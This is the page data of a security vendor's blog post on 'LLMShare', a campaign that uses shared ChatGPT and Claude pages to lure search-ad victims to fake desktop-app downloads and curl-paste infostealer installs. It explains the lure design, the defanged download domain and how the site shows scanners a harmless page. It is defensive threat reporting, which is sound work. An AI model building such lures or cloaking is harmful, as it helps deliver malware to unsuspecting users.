[{"data":1,"prerenderedAt":5027},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":100,"navbar-resource-highlight":174,"blog/llmshare-malvertising-campaign":220},[4],{"enabled":5,"name":6},false,"maintenanceMode",[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"query":14,"data":15,"variations":20,"lastUpdated":21,"firstPublished":22,"testRatio":23,"createdBy":24,"lastUpdatedBy":25,"folders":26,"meta":27,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",[],{"type":16,"url":17,"text":18,"link":19},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":28,"lastPreviewUrl":29,"breakpoints":30,"hasAutosaves":34},"data","",{"xsmall":31,"small":32,"medium":33},320,640,768,true,"sq5m7hrtt1",{"createdDate":37,"id":38,"name":39,"modelId":40,"published":13,"stageModifiedSincePublish":5,"query":41,"data":42,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":23,"createdBy":92,"lastUpdatedBy":93,"folders":94,"meta":95,"rev":99},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"url":29,"ctaText":43,"text":44,"blocks":45,"state":85},"ewrererw","testrfesssssssssss",[46,73],{"@type":47,"@version":48,"id":49,"component":50,"responsiveStyles":63},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":51,"tag":51,"options":52,"isRSC":62},"TopBannerContent",{"text":53,"ctaText":54,"url":55,"mainText":56,"cta":59},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https://pushsecurity.com/webinar/state-of-browser-security",{"content":57,"fontSize":58},"\u003Cp>Is your stack covered? 
51 browser &amp; identity attacks, mapped.\u003C/p>","text-base",{"content":60,"fontSize":58,"url":61},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">See the matrix →\u003C/strong>\u003C/p>\n","https://pushsecurity.com/resources/browser-identity-attacks-matrix/",null,{"large":64},{"display":65,"flexDirection":66,"position":67,"flexShrink":68,"boxSizing":69,"marginTop":70,"marginBottom":70,"fontSize":71,"fontWeight":72},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":74,"@type":47,"tagName":75,"properties":76,"responsiveStyles":80},"builder-pixel-6qjv2xx1o93","img",{"src":77,"aria-hidden":78,"alt":29,"role":79,"width":68,"height":68},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":81},{"height":68,"width":68,"display":82,"opacity":68,"overflow":83,"pointerEvents":84},"block","hidden","none",{"deviceSize":86,"location":87},"large",{"path":29,"query":88},{},{},1778612252607,1774968080803,"ST0tXQM8slWpFrmioqKHmENB2qe2","ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"kind":96,"hasLinks":5,"breakpoints":97,"lastPreviewUrl":98,"hasAutosaves":34,"hasErrors":5},"component",{"xsmall":31,"small":32,"medium":33},"https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","e6y99wzygj4",[10
1,137],{"createdDate":102,"id":103,"name":104,"modelId":105,"published":13,"stageModifiedSincePublish":5,"query":106,"data":107,"variations":130,"lastUpdated":131,"firstPublished":132,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":133,"meta":134,"rev":136},1776247359804,"9136a8f18b3b4a6ba29b8653a99372b1","testimonial-inductive-automation","20d9eaa352304613b3d1a794b400703d",[],{"link":108,"type":109,"testimonialLink":110,"testimonial":111},{},"testimonial","/customer-stories/inductive-automation",{"@type":112,"id":113,"model":109,"value":114},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79",{"query":115,"folders":116,"createdDate":117,"id":113,"name":118,"modelId":119,"published":13,"data":120,"variations":124,"lastUpdated":125,"firstPublished":126,"testRatio":23,"createdBy":92,"lastUpdatedBy":92,"meta":127,"rev":129},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":121,"jobTitle":122,"quote":118,"image":123},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":28,"lastPreviewUrl":29,"breakpoints":128,"hasAutosaves":34},{"small":32,"medium":33},"ejb4610smqd",{},1776247404986,1776247404973,[],{"breakpoints":135,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},"qmd9dqqccme",{"createdDate":138,"id":139,"name":140,"modelId":105,"published":13,"meta":141,"stageModifiedSincePublish":5,"query":143,"data":144,"variations":170,"lastUpdated":171,"firstPublished":172,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":173,"rev":136},1776255761419,"05a9322735fc427db12e2740e4302300","Report: 2026 Browser Attack 
Techniques",{"breakpoints":142,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":145,"link":164,"type":167,"title":140,"description":168,"image":169},{"@type":112,"id":146,"model":109,"value":147},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":148,"folders":149,"createdDate":150,"id":146,"name":151,"modelId":119,"published":13,"data":152,"variations":158,"lastUpdated":159,"firstPublished":160,"testRatio":23,"createdBy":92,"lastUpdatedBy":24,"meta":161,"rev":163},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":153,"jobTitle":154,"author":155,"qoute":29,"quote":156,"image":157},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":28,"lastPreviewUrl":29,"breakpoints":162,"hasAutosaves":34},{"small":32,"medium":33},"8ke3s17c50t",{"text":165,"url":166},"Download now","/resources/browser-attacks-report","resource","Learn about the latest techniques being used in the 
wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{},1776255810913,1776255810900,[],[175,198],{"createdDate":176,"id":177,"name":140,"modelId":178,"published":13,"meta":179,"stageModifiedSincePublish":5,"query":181,"data":182,"variations":193,"lastUpdated":194,"firstPublished":195,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":196,"rev":197},1776256900280,"1f429607996e4e5fae8fe3f9b9610e55","4829faa81e7c4ee8bd2d000e160e8d3c",{"breakpoints":180,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":183,"link":192,"type":167,"title":140,"description":168,"image":169},{"@type":112,"id":146,"model":109,"value":184},{"query":185,"folders":186,"createdDate":150,"id":146,"name":151,"modelId":119,"published":13,"data":187,"variations":188,"lastUpdated":159,"firstPublished":160,"testRatio":23,"createdBy":92,"lastUpdatedBy":24,"meta":189,"rev":191},[],[],{"video":153,"jobTitle":154,"author":155,"qoute":29,"quote":156,"image":157},{},{"kind":28,"lastPreviewUrl":29,"breakpoints":190,"hasAutosaves":34},{"small":32,"medium":33},"r2hfsxeegak",{"text":165,"url":166},{},1776256937553,1776256937540,[],"ruwk571l1sp",{"createdDate":199,"id":200,"name":201,"modelId":178,"published":13,"stageModifiedSincePublish":5,"query":202,"data":203,"variations":214,"lastUpdated":215,"firstPublished":216,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":217,"meta":218,"rev":197},1776256949234,"ce043785b71b4ece98eac811ecf4ba10","inductive-automation",[],{"link":204,"type":109,"testimonial":205,"testimonialLink":110},{},{"@type":112,"id":113,"model":109,"value":206},{"query":207,"folders":208,"createdDate":117,"id":113,"name":118,"modelId":119,"published":13,"data":209,"variations":210,"lastUpdated":125,"firstPublished":126,"testRatio":23,"createdBy":92,"lastUpdatedBy":92,"meta":211,"rev":213},[],[],{"author":121,"jobTitle":122,"quote":118,"image":123},{},{"kind":
28,"lastPreviewUrl":29,"breakpoints":212,"hasAutosaves":34},{"small":32,"medium":33},"ifd0kiul0a8",{},1776256974140,1776256974130,[],{"breakpoints":219,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},{"id":221,"title":222,"authorsCollection":223,"content":231,"extension":1173,"featured":5,"hashTags":62,"meta":1174,"metaTitle":1175,"ogImage":62,"publishedDate":1176,"relatedBlogPostsCollection":1177,"slug":5003,"stem":5004,"subtitle":62,"summary":5005,"synopsis":5016,"sys":5017,"tagsCollection":5020,"__hash__":5026},"blog/blog/llmshare-malvertising-campaign.json","LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms",{"items":224},[225],{"fullName":226,"firstName":227,"jobTitle":228,"profilePicture":229},"Keanu Maharaj","Keanu","Senior Security Researcher",{"url":230},"https://images.ctfassets.net/y1cdw1ablpvd/VCGOm62jiocjwngWTh32U/e9a30637b1c76bf988d2fec90f5b6c36/1689361049351_1.png",{"json":232,"links":1045},{"nodeType":233,"data":234,"content":235},"document",{},[236,245,252,284,291,300,306,319,323,332,349,356,362,369,376,382,385,393,400,406,412,419,426,445,451,454,462,480,486,493,496,504,511,518,524,530,579,586,589,597,604,612,655,662,693,700,743,750,753,761,780,787,795,811,818,837,844,847,854,861,879,882,890,909,916,1039],{"nodeType":237,"data":238,"content":239},"paragraph",{},[240],{"nodeType":241,"value":242,"marks":243,"data":244},"text","Shared conversations on AI chatbot platforms have become the latest delivery mechanism for malware campaigns targeting macOS and Windows users. Attackers create content on platforms like ChatGPT and Claude that appears to offer installation guidance or service updates, then drive traffic to it via search engine results in the form of malvertising and SEO poisoning.  
",[],{},{"nodeType":237,"data":246,"content":247},{},[248],{"nodeType":241,"value":249,"marks":250,"data":251},"The content lives on chatgpt.com or claude.ai — domains that users and security tools trust implicitly — so the attack bypasses URL reputation checks before the victim even reaches the malicious payload.",[],{},{"nodeType":237,"data":253,"content":254},{},[255,259,268,272,280],{"nodeType":241,"value":256,"marks":257,"data":258},"Several variants of this technique have been",[],{},{"nodeType":260,"data":261,"content":263},"hyperlink",{"uri":262},"https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/",[264],{"nodeType":241,"value":265,"marks":266,"data":267}," reported over the past few months",[],{},{"nodeType":241,"value":269,"marks":270,"data":271},". The earliest examples used shared Claude.ai conversations disguised as installation guides — complete with fake \"Apple Support\" attribution — that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer.",[],{},{"nodeType":260,"data":273,"content":275},{"uri":274},"https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/",[276],{"nodeType":241,"value":277,"marks":278,"data":279}," Kaspersky documented a parallel campaign",[],{},{"nodeType":241,"value":281,"marks":282,"data":283}," using shared ChatGPT conversations to deliver the AMOS (Atomic macOS Stealer) via the same paste-this-command social engineering pattern. 
",[],{},{"nodeType":237,"data":285,"content":286},{},[287],{"nodeType":241,"value":288,"marks":289,"data":290},"Push has detected a new variant that goes beyond the previously reported technique of embedding terminal commands in shared conversations: the attacker has used ChatGPT's code rendering feature to build a fully designed fake page that mimics a ChatGPT service disruption, redirecting victims to a convincing clone of ChatGPT's download page that delivers a malicious executable. ",[],{},{"nodeType":292,"data":293,"content":299},"embedded-entry-block",{"target":294},{"sys":295},{"id":296,"type":297,"linkType":298},"5lz9zt223pecGvdaqdvSTQ","Link","Entry",[],{"nodeType":292,"data":301,"content":305},{"target":302},{"sys":303},{"id":304,"type":297,"linkType":298},"51GomAj3VOjnbmgd1DWYu0",[],{"nodeType":237,"data":307,"content":308},{},[309,315],{"nodeType":241,"value":310,"marks":311,"data":314},"This is a live campaign which is still generating detections across our customer base at the time of writing. ",[312],{"type":313},"bold",{},{"nodeType":241,"value":316,"marks":317,"data":318},"Push customers are already protected and do not need to take further action. The malicious page URLs can be found at the end of this report but are not exhaustive and are liable to change. 
",[],{},{"nodeType":320,"data":321,"content":322},"hr",{},[],{"nodeType":324,"data":325,"content":326},"heading-1",{},[327],{"nodeType":241,"value":328,"marks":329,"data":331},"A fake page, not a fake conversation",[330],{"type":313},{},{"nodeType":237,"data":333,"content":334},{},[335,339,345],{"nodeType":241,"value":336,"marks":337,"data":338},"Previously reported variants relied on shared ",[],{},{"nodeType":241,"value":340,"marks":341,"data":344},"conversations",[342],{"type":343},"italic",{},{"nodeType":241,"value":346,"marks":347,"data":348}," — the attacker created a chat that contained step-by-step instructions for the victim to follow, typically involving pasting a command into their terminal. The social engineering was conversational: the \"AI assistant\" appeared to be helpfully guiding the user through an installation process.",[],{},{"nodeType":237,"data":350,"content":351},{},[352],{"nodeType":241,"value":353,"marks":354,"data":355},"But now, rather than a shared conversation, the attacker has used ChatGPT's code rendering feature to create a fully designed, self-contained web page hosted at a chatgpt.com/s/ URL. It renders as what appears to be a ChatGPT service disruption notice:",[],{},{"nodeType":292,"data":357,"content":361},{"target":358},{"sys":359},{"id":360,"type":297,"linkType":298},"1O9gyQab81SnbxhQp2aa5Z",[],{"nodeType":237,"data":363,"content":364},{},[365],{"nodeType":241,"value":366,"marks":367,"data":368},"A professional-looking error message reads: \"We're experiencing high traffic right now. Our website is temporarily unavailable due to a large number of users. 
Download our desktop app to continue.\" A prominent download button sits below.",[],{},{"nodeType":237,"data":370,"content":371},{},[372],{"nodeType":241,"value":373,"marks":374,"data":375},"The \"Show code\" toggle at the top of the page reveals what's actually happening — the entire thing is custom HTML and CSS, authored to mimic a ChatGPT system notice, rendered using ChatGPT's code output feature. A web page inside a web page, hosted on a domain that every URL reputation system in the world considers safe.",[],{},{"nodeType":292,"data":377,"content":381},{"target":378},{"sys":379},{"id":380,"type":297,"linkType":298},"4kQTfxB3aVH9W9BeYOuljP",[],{"nodeType":320,"data":383,"content":384},{},[],{"nodeType":324,"data":386,"content":387},{},[388],{"nodeType":241,"value":389,"marks":390,"data":392},"The download page",[391],{"type":313},{},{"nodeType":237,"data":394,"content":395},{},[396],{"nodeType":241,"value":397,"marks":398,"data":399},"Clicking the download button redirects the user to openew[.]app, which presents a convincing clone of ChatGPT's official desktop application download page — complete with OpenAI branding, macOS and Windows download buttons, a Chrome extension link, and a mobile download section.",[],{},{"nodeType":292,"data":401,"content":405},{"target":402},{"sys":403},{"id":404,"type":297,"linkType":298},"4MdFc4OB37ZihTGx506QJ6",[],{"nodeType":292,"data":407,"content":411},{"target":408},{"sys":409},{"id":410,"type":297,"linkType":298},"LaPUy0zpIeY8s4PF2wkat",[],{"nodeType":237,"data":413,"content":414},{},[415],{"nodeType":241,"value":416,"marks":417,"data":418},"The site also displays differently depending on who visits it. When Push researchers examined the URL via URLScan, the scanner was redirected to a different page entirely — a generic AR/VR company website with no obvious connection to ChatGPT. 
",[],{},{"nodeType":237,"data":420,"content":421},{},[422],{"nodeType":241,"value":423,"marks":424,"data":425},"Real users in a browser see the fake download page; automated scanners and bots see something benign. This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.",[],{},{"nodeType":237,"data":427,"content":428},{},[429,433,441],{"nodeType":241,"value":430,"marks":431,"data":432},"The downloaded executable poses as \"ChatGPT for Desktop\" and is",[],{},{"nodeType":260,"data":434,"content":436},{"uri":435},"https://www.virustotal.com/gui/file/de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[437],{"nodeType":241,"value":438,"marks":439,"data":440}," flagged on VirusTotal",[],{},{"nodeType":241,"value":442,"marks":443,"data":444},".",[],{},{"nodeType":292,"data":446,"content":450},{"target":447},{"sys":448},{"id":449,"type":297,"linkType":298},"3FSbwoFJYQrcyo9uMsQIWI",[],{"nodeType":320,"data":452,"content":453},{},[],{"nodeType":324,"data":455,"content":456},{},[457],{"nodeType":241,"value":458,"marks":459,"data":461},"The Claude variant: same campaign, different platform",[460],{"type":313},{},{"nodeType":237,"data":463,"content":464},{},[465,469,476],{"nodeType":241,"value":466,"marks":467,"data":468},"Alongside the ChatGPT rendered-page variant, Push has also detected the previously reported style of attack using shared Claude.ai conversations. 
These follow the pattern documented by",[],{},{"nodeType":260,"data":470,"content":471},{"uri":262},[472],{"nodeType":241,"value":473,"marks":474,"data":475}," BleepingComputer",[],{},{"nodeType":241,"value":477,"marks":478,"data":479},": a shared chat disguised as a \"Claude Code on Mac\" installation guide, attributed to \"Apple Support,\" containing a curl command that downloads and executes malware.",[],{},{"nodeType":292,"data":481,"content":485},{"target":482},{"sys":483},{"id":484,"type":297,"linkType":298},"5sWayuTsVdiLSLoS4sv2Vc",[],{"nodeType":237,"data":487,"content":488},{},[489],{"nodeType":241,"value":490,"marks":491,"data":492},"The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign — or at least a shared playbook — that is actively experimenting with different platforms and different social engineering approaches to find what converts best.",[],{},{"nodeType":320,"data":494,"content":495},{},[],{"nodeType":324,"data":497,"content":498},{},[499],{"nodeType":241,"value":500,"marks":501,"data":503},"Malvertising remains one of the top phishing delivery channels",[502],{"type":313},{},{"nodeType":237,"data":505,"content":506},{},[507],{"nodeType":241,"value":508,"marks":509,"data":510},"Push has detected this variant across multiple customer environments, with users arriving at these shared chat URLs after searching for terms including \"chatgpt,\" \"chatgpt free,\" \"chat gpt,\" and common typos like \"chatgo,\" \"chatgot,\" and \"cvhatgpt.\" ",[],{},{"nodeType":237,"data":512,"content":513},{},[514],{"nodeType":241,"value":515,"marks":516,"data":517},"You can see an example of this below: it's incredibly convincing, and uses the real ChatGPT domain — so even users that are paying attention are liable to fall for it. 
",[],{},{"nodeType":292,"data":519,"content":523},{"target":520},{"sys":521},{"id":522,"type":297,"linkType":298},"1GYWOyHpZT1rdTm6IGOKu8",[],{"nodeType":292,"data":525,"content":529},{"target":526},{"sys":527},{"id":528,"type":297,"linkType":298},"4HpFJRAZH2lbygaEk2xOnN",[],{"nodeType":237,"data":531,"content":532},{},[533,537,545,549,557,561,575],{"nodeType":241,"value":534,"marks":535,"data":536},"This fits a pattern Push has tracked extensively.",[],{},{"nodeType":260,"data":538,"content":540},{"uri":539},"https://pushsecurity.com/blog/verizon-dbir-2026-review/",[541],{"nodeType":241,"value":542,"marks":543,"data":544}," Search-based delivery is now the dominant channel for malware distribution",[],{},{"nodeType":241,"value":546,"marks":547,"data":548}," — our own data shows that ClickFix attacks are reached via search results rather than email in 4 of 5 cases, and Push's own research into",[],{},{"nodeType":260,"data":550,"content":552},{"uri":551},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[553],{"nodeType":241,"value":554,"marks":555,"data":556}," malvertising campaigns impersonating brands like TradingView",[],{},{"nodeType":241,"value":558,"marks":559,"data":560}," and",[],{},{"nodeType":260,"data":562,"content":564},{"uri":563},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[565,569],{"nodeType":241,"value":566,"marks":567,"data":568}," ",[],{},{"nodeType":241,"value":570,"marks":571,"data":574},"Ahrefs",[572],{"type":573},"underline",{},{"nodeType":241,"value":576,"marks":577,"data":578}," has demonstrated how effectively search ads can funnel victims to malicious pages. 
",[],{},{"nodeType":237,"data":580,"content":581},{},[582],{"nodeType":241,"value":583,"marks":584,"data":585},"The shared-chat technique adds a new dimension: the destination URL itself is genuine (chatgpt.com, claude.ai), which means even a cautious user who checks the URL before clicking will see nothing suspicious.",[],{},{"nodeType":320,"data":587,"content":588},{},[],{"nodeType":324,"data":590,"content":591},{},[592],{"nodeType":241,"value":593,"marks":594,"data":596},"Legitimate platform abuse is everywhere",[595],{"type":313},{},{"nodeType":237,"data":598,"content":599},{},[600],{"nodeType":241,"value":601,"marks":602,"data":603},"This is one example of a much broader pattern that has become one of the defining characteristics of the 2026 threat landscape: attackers systematically abusing legitimate platforms as attack infrastructure. The scale and variety of this abuse in recent months alone is striking, and it spans every stage of the phishing chain.",[],{},{"nodeType":605,"data":606,"content":607},"heading-2",{},[608],{"nodeType":241,"value":609,"marks":610,"data":611},"Legit platform abuse for delivery",[],{},{"nodeType":237,"data":613,"content":614},{},[615,619,627,631,639,643,651],{"nodeType":241,"value":616,"marks":617,"data":618},"On the delivery side, attackers have been",[],{},{"nodeType":260,"data":620,"content":622},{"uri":621},"https://www.bleepingcomputer.com/news/security/amazon-ses-increasingly-abused-in-phishing-to-evade-detection/",[623],{"nodeType":241,"value":624,"marks":625,"data":626}," weaponizing stolen AWS credentials to send phishing through Amazon SES",[],{},{"nodeType":241,"value":628,"marks":629,"data":630}," that passes SPF, DKIM, and DMARC validation because SES is a legitimate Amazon service. 
A Vietnamese operation dubbed",[],{},{"nodeType":260,"data":632,"content":634},{"uri":633},"https://thehackernews.com/2026/05/30000-facebook-accounts-hacked-via.html",[635],{"nodeType":241,"value":636,"marks":637,"data":638}," AccountDumpling used Google AppSheet's built-in email capability",[],{},{"nodeType":241,"value":640,"marks":641,"data":642}," as a phishing relay to harvest 30,000 Facebook credentials.",[],{},{"nodeType":260,"data":644,"content":646},{"uri":645},"https://techcrunch.com/2026/05/21/scammers-are-abusing-an-internal-microsoft-account-to-send-spam/",[647],{"nodeType":241,"value":648,"marks":649,"data":650}," Scammers exploited Microsoft's own internal notification pipeline",[],{},{"nodeType":241,"value":652,"marks":653,"data":654}," — sending phishing from the same msonlineservicesteam@microsoftonline.com address that delivers legitimate 2FA codes — with Spamhaus confirming months of ongoing abuse.",[],{},{"nodeType":605,"data":656,"content":657},{},[658],{"nodeType":241,"value":659,"marks":660,"data":661},"Legit platform abuse for hosting",[],{},{"nodeType":237,"data":663,"content":664},{},[665,669,677,681,689],{"nodeType":241,"value":666,"marks":667,"data":668},"For hosting, the platforms being abused read like a who's who of modern web infrastructure.",[],{},{"nodeType":260,"data":670,"content":672},{"uri":671},"https://www.securityweek.com/over-500-organizations-hit-in-years-long-phishing-campaign/",[673],{"nodeType":241,"value":674,"marks":675,"data":676}," Operation HookedWing ran for four years",[],{},{"nodeType":241,"value":678,"marks":679,"data":680}," on GitHub Pages and Vercel, compromising 500+ organizations across more than 100 GitHub Pages domains before anyone documented it publicly. 
Cofense has separately",[],{},{"nodeType":260,"data":682,"content":684},{"uri":683},"https://cofense.com/blog/steal-smarter-not-harder-malicious-use-of-vercel-for-credential-phishing/",[685],{"nodeType":241,"value":686,"marks":687,"data":688}," documented the growing abuse of Vercel",[],{},{"nodeType":241,"value":690,"marks":691,"data":692}," for credential phishing hosting. Pixm's Q1 2026 phishing report tracked over 100 unique Azure Blob Storage subdomain variants hosting phishing content that carried Microsoft's own domain reputation, alongside abuse of Cloudflare CDN, Cloudflare Workers, Cloudflare R2, Backblaze B2, and Supabase. ",[],{},{"nodeType":605,"data":694,"content":695},{},[696],{"nodeType":241,"value":697,"marks":698,"data":699},"Abuse of compromised websites that are otherwise legit",[],{},{"nodeType":237,"data":701,"content":702},{},[703,707,715,719,727,731,739],{"nodeType":241,"value":704,"marks":705,"data":706},"Compromised legitimate sites are also being repurposed at scale. A mass exploitation of a",[],{},{"nodeType":260,"data":708,"content":710},{"uri":709},"https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/",[711],{"nodeType":241,"value":712,"marks":713,"data":714}," Ghost CMS vulnerability planted ClickFix pages across 700+ websites",[],{},{"nodeType":241,"value":716,"marks":717,"data":718}," including Harvard, Oxford, and DuckDuckGo subdomains. 
Microsoft recently documented a campaign where",[],{},{"nodeType":260,"data":720,"content":722},{"uri":721},"https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",[723],{"nodeType":241,"value":724,"marks":725,"data":726}," SEO poisoning was combined with AI chatbot recommendation manipulation",[],{},{"nodeType":241,"value":728,"marks":729,"data":730}," to deliver GPU mining malware — extending the poisoning from traditional search results into AI-generated software recommendations. And",[],{},{"nodeType":260,"data":732,"content":734},{"uri":733},"https://www.helpnetsecurity.com/2026/05/27/deno-rat-malware-fake-chatgpt-claude-installers/",[735],{"nodeType":241,"value":736,"marks":737,"data":738}," fake ChatGPT and Claude installers on GitHub and SourceForge",[],{},{"nodeType":241,"value":740,"marks":741,"data":742}," have been delivering the DinDoor backdoor and a Deno-based RAT via repositories that mimic legitimate developer tool distributions.",[],{},{"nodeType":237,"data":744,"content":745},{},[746],{"nodeType":241,"value":747,"marks":748,"data":749},"The structural problem is that every one of these platforms is genuinely legitimate, and the security controls that evaluate them — domain reputation, email authentication, URL categorization — confirm them as trusted because they are trusted. This attack extends this pattern into new territory by weaponizing the content-sharing features of AI chatbot platforms specifically, but the underlying principles are the same. 
",[],{},{"nodeType":320,"data":751,"content":752},{},[],{"nodeType":324,"data":754,"content":755},{},[756],{"nodeType":241,"value":757,"marks":758,"data":760},"Impact analysis",[759],{"type":313},{},{"nodeType":237,"data":762,"content":763},{},[764,768,776],{"nodeType":241,"value":765,"marks":766,"data":767},"Shared-chat malware delivery exploits a structural property of AI platforms that traditional security controls aren't designed to handle. Domain reputation, URL categorization, and safe browsing databases all treat chatgpt.com and claude.ai as trusted — because they are. Using these trusted pages to link off to further convincing-looking pages hosting malware allows the attacker to run campaigns that blend in, as well as rotate the phishing delivery pages later in the chain should they ever be flagged, allowing the campaign to continue without interruption (a well known ",[],{},{"nodeType":260,"data":769,"content":771},{"uri":770},"https://phishing-techniques.pushsecurity.com/",[772],{"nodeType":241,"value":773,"marks":774,"data":775},"detection evasion technique",[],{},{"nodeType":241,"value":777,"marks":778,"data":779},"). ",[],{},{"nodeType":237,"data":781,"content":782},{},[783],{"nodeType":241,"value":784,"marks":785,"data":786},"What makes the rendered-page variant particularly concerning is that it eliminates the most obvious red flag in the earlier attacks. The Claude.ai conversation variants required the victim to recognize that a shared chat instructing them to paste terminal commands might be suspicious — a tall order for many users, but at least the attack surface was visible. The rendered-page variant shows nothing that looks like an attack. It presents what appears to be a routine service disruption with a reasonable call to action: download the desktop app to continue using ChatGPT. 
",[],{},{"nodeType":605,"data":788,"content":789},{},[790],{"nodeType":241,"value":791,"marks":792,"data":794},"How Push detected the attack",[793],{"type":313},{},{"nodeType":237,"data":796,"content":797},{},[798,802,807],{"nodeType":241,"value":799,"marks":800,"data":801},"We've aligned our detection logic for this technique under the name ",[],{},{"nodeType":241,"value":803,"marks":804,"data":806},"LLMShare",[805],{"type":313},{},{"nodeType":241,"value":808,"marks":809,"data":810}," — a technique-level detection that covers shared content abuse across LLM platforms, not tied to any single campaign or set of IOCs. ",[],{},{"nodeType":237,"data":812,"content":813},{},[814],{"nodeType":241,"value":815,"marks":816,"data":817},"Because Push sees the full context of how a user arrived at a page and what that page does once it renders, we can identify LLMShare attacks regardless of which AI platform is being abused or what social engineering wrapper the attacker has chosen. ",[],{},{"nodeType":237,"data":819,"content":820},{},[821,825,833],{"nodeType":241,"value":822,"marks":823,"data":824},"When we identified the initial instances of this campaign, we used our",[],{},{"nodeType":260,"data":826,"content":828},{"uri":827},"https://pushsecurity.com/blog/can-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline/",[829],{"nodeType":241,"value":830,"marks":831,"data":832}," agentic threat hunting pipeline",[],{},{"nodeType":241,"value":834,"marks":835,"data":836}," to hunt for additional examples across our customer telemetry, develop the LLMShare detection, and rapidly deploy it to customers. Push blocks users from interacting with the page before any malicious activity can occur. 
